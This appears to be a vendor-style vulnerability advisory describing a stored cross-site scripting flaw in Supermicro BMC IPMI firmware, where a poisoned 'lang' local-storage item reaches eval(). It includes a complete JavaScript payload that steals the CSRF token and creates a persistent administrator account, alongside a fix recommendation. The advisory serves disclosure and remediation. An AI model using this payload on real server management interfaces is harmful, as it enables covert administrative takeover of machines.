Stored cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the `man_ikvm_html5_bootstrap` and `man_ikvm_html5_bootstrap_vm` webpages using `lang` local storage item

Image preview

man_ikvm_html5_bootstrap and man_ikvm_html5_bootstrap_vm webserver HTML pages load nav_ui.js script, which passes the value of lang local storage item to the eval() JavaScript function without any sanitization:

...
var sel = WebUtil.readSetting("lang", "en");
...
change_ui_lang(sel);
...

WebUtil.readSetting = function (name, defaultValue) {
    "use strict";
    var value;
    if (window.chrome && window.chrome.storage) {
        value = WebUtil.settings[name];
    } else {
        value = localStorage.getItem(name);
    }
    if (typeof value === "undefined") {
        value = null;
    }
    if (value === null && typeof defaultValue !== undefined) {
        return defaultValue;
    } else {
        return value;
    }
};

function change_ui_lang(v) {
    ...
    var lang = eval(v + "_lang");
    ...

As a result, arbitrary JavaScript code can be injected into webpages, which will be executed on behalf of the authenticated user.

Image preview

The first step to exploit this vulnerability is to poison the lang local storage item. This can be achieved using another vulnerability in the web server (e.g. with XSS), as well as through exploitation of other system components, for example, with a malware.

To create an administrator account with username BRLY and password BRLYBRLY an attacker can poison the lang local storage item of an authenticated user session with administrative privileges with the following payload:

var csrfRegex=/CSRF_TOKEN", "([^"]*?)"/g;var csrfMatch=csrfRegex.exec(document.body.innerHTML);var csrf=csrfMatch[1];fetch("/cgi/op.cgi",{method:"POST",headers:{"Csrf_token":csrf},body:"op=config_user&username=BRLY&original_username=2&password=BRLYBRLY&new_privilege=4&_="});'

This payload first obtains the user's CSRF token and then uses it to make a POST request in order to create a user with administrative privileges and credentials defined by the attacker.

NOTE: The payload will be executed every time the victim visits vulnerable pages while the lang local storage item value is poisoned, even after logging in again, making this attack persistent. To terminate the exploitation, additional steps are required to clear the element local storage value.

Image preview

Ideally, user controlled inputs should not be passed to dangerous JavaScript functions such as eval(). If it is not possible in such case, the lang local storage item value must be checked against a whitelist of allowed values.

Image preview

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Image preview

BINARLY team

Image preview